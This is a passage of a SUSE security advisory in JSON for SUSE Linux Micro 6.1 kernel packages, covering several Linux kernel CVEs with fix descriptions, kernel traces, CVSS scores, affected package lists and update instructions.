"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-39813"
},
{
"cve": "CVE-2025-39829",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39829"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntrace/fgraph: Fix the warning caused by missing unregister notifier\n\nThis warning was triggered during testing on v6.16:\n\nnotifier callback ftrace_suspend_notifier_call already registered\nWARNING: CPU: 2 PID: 86 at kernel/notifier.c:23 notifier_chain_register+0x44/0xb0\n...\nCall Trace:\n \u003cTASK\u003e\n blocking_notifier_chain_register+0x34/0x60\n register_ftrace_graph+0x330/0x410\n ftrace_profile_write+0x1e9/0x340\n vfs_write+0xf8/0x420\n ? filp_flush+0x8a/0xa0\n ? filp_close+0x1f/0x30\n ? do_dup2+0xaf/0x160\n ksys_write+0x65/0xe0\n do_syscall_64+0xa4/0x260\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nWhen writing to the function_profile_enabled interface, the notifier was\nnot unregistered after start_graph_tracing failed, causing a warning the\nnext time function_profile_enabled was written.\n\nFixed by adding unregister_pm_notifier in the exception path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39829",
"url": "https://www.suse.com/security/cve/CVE-2025-39829"
},
{
"category": "external",
"summary": "SUSE Bug 1250082 for CVE-2025-39829",
"url": "https://bugzilla.suse.com/1250082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-39829"
},
{
"cve": "CVE-2025-39880",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39880"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix invalid accesses to ceph_connection_v1_info\n\nThere is a place where generic code in messenger.c is reading and\nanother place where it is writing to con-\u003ev1 union member without\nchecking that the union member is active (i.e. msgr1 is in use).\n\nOn 64-bit systems, con-\u003ev1.auth_retry overlaps with con-\u003ev2.out_iter,\nso such a read is almost guaranteed to return a bogus value instead of\n0 when msgr2 is in use. This ends up being fairly benign because the\nside effect is just the invalidation of the authorizer and successive\nfetching of new tickets.\n\ncon-\u003ev1.connect_seq overlaps with con-\u003ev2.conn_bufs and the fact that\nit\u0027s being written to can cause more serious consequences, but luckily\nit\u0027s not something that happens often.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39880",
"url": "https://www.suse.com/security/cve/CVE-2025-39880"
},
{
"category": "external",
"summary": "SUSE Bug 1250388 for CVE-2025-39880",
"url": "https://bugzilla.suse.com/1250388"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-39880"
},
{
"cve": "CVE-2025-39890",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39890"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix memory leak in ath12k_service_ready_ext_event\n\nCurrently, in ath12k_service_ready_ext_event(), svc_rdy_ext.mac_phy_caps\nis not freed in the failure case, causing a memory leak. The following\ntrace is observed in kmemleak:\n\nunreferenced object 0xffff8b3eb5789c00 (size 1024):\n comm \"softirq\", pid 0, jiffies 4294942577\n hex dump (first 32 bytes):\n 00 00 00 00 01 00 00 00 00 00 00 00 7b 00 00 10 ............{...\n 01 00 00 00 00 00 00 00 01 00 00 00 1f 38 00 00 .............8..\n backtrace (crc 44e1c357):\n __kmalloc_noprof+0x30b/0x410\n ath12k_wmi_mac_phy_caps_parse+0x84/0x100 [ath12k]\n ath12k_wmi_tlv_iter+0x5e/0x140 [ath12k]\n ath12k_wmi_svc_rdy_ext_parse+0x308/0x4c0 [ath12k]\n ath12k_wmi_tlv_iter+0x5e/0x140 [ath12k]\n ath12k_service_ready_ext_event.isra.0+0x44/0xd0 [ath12k]\n ath12k_wmi_op_rx+0x2eb/0xd70 [ath12k]\n ath12k_htc_rx_completion_handler+0x1f4/0x330 [ath12k]\n ath12k_ce_recv_process_cb+0x218/0x300 [ath12k]\n ath12k_pci_ce_workqueue+0x1b/0x30 [ath12k]\n process_one_work+0x219/0x680\n bh_worker+0x198/0x1f0\n tasklet_action+0x13/0x30\n handle_softirqs+0xca/0x460\n __irq_exit_rcu+0xbe/0x110\n irq_exit_rcu+0x9/0x30\n\nFree svc_rdy_ext.mac_phy_caps in the error case to fix this memory leak.\n\nTested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.4.1-00199-QCAHKSWPL_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39890",
"url": "https://www.suse.com/security/cve/CVE-2025-39890"
},
{
"category": "external",
"summary": "SUSE Bug 1250334 for CVE-2025-39890",
"url": "https://bugzilla.suse.com/1250334"
},
{
"category": "external",
"summary": "SUSE Bug 1250488 for CVE-2025-39890",
"url": "https://bugzilla.suse.com/1250488"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-39890"
},
{
"cve": "CVE-2025-39913",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39913"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-\u003ecork.\n\nsyzbot reported the splat below. [0]\n\nThe repro does the following:\n\n 1. Load a sk_msg prog that calls bpf_msg_cork_bytes(msg, cork_bytes)\n 2. Attach the prog to a SOCKMAP\n 3. Add a socket to the SOCKMAP\n 4. Activate fault injection\n 5. Send data less than cork_bytes\n\nAt 5., the data is carried over to the next sendmsg() as it is\nsmaller than the cork_bytes specified by bpf_msg_cork_bytes().\n\nThen, tcp_bpf_send_verdict() tries to allocate psock-\u003ecork to hold\nthe data, but this fails silently due to fault injection + __GFP_NOWARN.\n\nIf the allocation fails, we need to revert the sk-\u003esk_forward_alloc\nchange done by sk_msg_alloc().\n\nLet\u0027s call sk_msg_free() when tcp_bpf_send_verdict fails to allocate\npsock-\u003ecork.\n\nThe \"*copied\" also needs to be updated such that a proper error can\nbe returned to the caller, sendmsg. It fails to allocate psock-\u003ecork.\nNothing has been corked so far, so this patch simply sets \"*copied\"\nto 0.\n\n[0]:\nWARNING: net/ipv4/af_inet.c:156 at inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156, CPU#1: syz-executor/5983\nModules linked in:\nCPU: 1 UID: 0 PID: 5983 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025\nRIP: 0010:inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156\nCode: 0f 0b 90 e9 62 fe ff ff e8 7a db b5 f7 90 0f 0b 90 e9 95 fe ff ff e8 6c db b5 f7 90 0f 0b 90 e9 bb fe ff ff e8 5e db b5 f7 90 \u003c0f\u003e 0b 90 e9 e1 fe ff ff 89 f9 80 e1 07 80 c1 03 38 c1 0f 8c 9f fc\nRSP: 0018:ffffc90000a08b48 EFLAGS: 00010246\nRAX: ffffffff8a09d0b2 RBX: dffffc0000000000 RCX: ffff888024a23c80\nRDX: 0000000000000100 RSI: 0000000000000fff RDI: 0000000000000000\nRBP: 0000000000000fff R08: ffff88807e07c627 R09: 1ffff1100fc0f8c4\nR10: dffffc0000000000 R11: ffffed100fc0f8c5 R12: ffff88807e07c380\nR13: dffffc0000000000 R14: ffff88807e07c60c R15: 1ffff1100fc0f872\nFS: 00005555604c4500(0000) GS:ffff888125af1000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00005555604df5c8 CR3: 0000000032b06000 CR4: 00000000003526f0\nCall Trace:\n \u003cIRQ\u003e\n __sk_destruct+0x86/0x660 net/core/sock.c:2339\n rcu_do_batch kernel/rcu/tree.c:2605 [inline]\n rcu_core+0xca8/0x1770 kernel/rcu/tree.c:2861\n handle_softirqs+0x286/0x870 kernel/softirq.c:579\n __do_softirq kernel/softirq.c:613 [inline]\n invoke_softirq kernel/softirq.c:453 [inline]\n __irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680\n irq_exit_rcu+0x9/0x30 kernel/softirq.c:696\n instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline]\n sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1052\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39913",
"url": "https://www.suse.com/security/cve/CVE-2025-39913"
},
{
"category": "external",
"summary": "SUSE Bug 1250705 for CVE-2025-39913",
"url": "https://bugzilla.suse.com/1250705"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-39913"
},
{
"cve": "CVE-2025-39977",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39977"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfutex: Prevent use-after-free during requeue-PI\n\nsyzbot managed to trigger the following race:\n\n T1 T2\n\n futex_wait_requeue_pi()\n futex_do_wait()\n schedule()\n futex_requeue()\n futex_proxy_trylock_atomic()\n futex_requeue_pi_prepare()\n requeue_pi_wake_futex()\n futex_requeue_pi_complete()\n /* preempt */\n\n * timeout/ signal wakes T1 *\n\n futex_requeue_pi_wakeup_sync() // Q_REQUEUE_PI_LOCKED\n futex_hash_put()\n // back to userland, on stack futex_q is garbage\n\n /* back */\n wake_up_state(q-\u003etask, TASK_NORMAL);\n\nIn this scenario futex_wait_requeue_pi() is able to leave without using\nfutex_q::lock_ptr for synchronization.\n\nThis can be prevented by reading futex_q::task before updating the\nfutex_q::requeue_state. A reference on the task_struct is not needed\nbecause requeue_pi_wake_futex() is invoked with a spinlock_t held which\nimplies a RCU read section.\n\nEven if T1 terminates immediately after, the task_struct will remain valid\nduring T2\u0027s wake_up_state(). A READ_ONCE on futex_q::task before\nfutex_requeue_pi_complete() is enough because it ensures that the variable\nis read before the state is updated.\n\nRead futex_q::task before updating the requeue state, use it for the\nfollowing wakeup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
